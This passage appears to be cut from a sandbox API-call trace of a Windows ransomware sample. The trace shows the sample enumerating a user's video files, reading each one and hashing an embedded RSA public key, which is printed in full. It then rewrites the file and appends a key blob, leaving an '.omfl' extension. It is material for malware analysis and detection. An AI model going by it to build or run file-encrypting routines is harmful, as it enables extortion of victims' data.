HALPmcxz\\Videos\\RD1ggKtKLkvJ.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rd1ggktklkvj.mp4.omfl")) returned 1 [0131.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.781] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.782] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.782] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b48340, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xcaef2aa0, ftLastAccessTime.dwHighDateTime=0x1d5e6ad, ftLastWriteTime.dwLowDateTime=0xcaef2aa0, ftLastWriteTime.dwHighDateTime=0x1d5e6ad, nFileSizeHigh=0x0, nFileSizeLow=0x15918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XzRFEhHHp D7j.mkv", cAlternateFileName="XZRFEH~1.MKV")) returned 1 [0131.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.782] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.782] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XzRFEhHHp D7j.mkv") returned=".mkv" [0131.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XzRFEhHHp D7j.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xzrfehhhp d7j.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.783] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=88344) returned 1 [0131.783] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.785] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x158f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.786] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.786] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.787] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.787] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x15918, lpOverlapped=0x0) returned 1 [0131.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.787] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.788] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.789] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.789] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.789] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.789] GetLastError () returned 0x0 [0131.789] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.789] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.789] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.789] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.789] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x15920) returned 0xdd35410 [0131.790] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd351f0 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171c0 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35238 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17220 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17250 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17268 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.790] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17268 | out: hHeap=0x4970000) returned 1 [0131.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17268 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17250 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17268 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.791] GetCurrentThreadId () returned 0x618 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2dff0 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.792] GetCurrentThreadId () returned 0x618 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.792] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.792] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17250 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17268 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17238 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17280 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.793] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.793] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17250 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17250 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.794] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17280 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17268 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17238 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17220 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35238 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.795] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.796] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.796] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x15913, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x15913, lpOverlapped=0x0) returned 1 [0131.796] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.796] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x15918, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.796] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.797] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 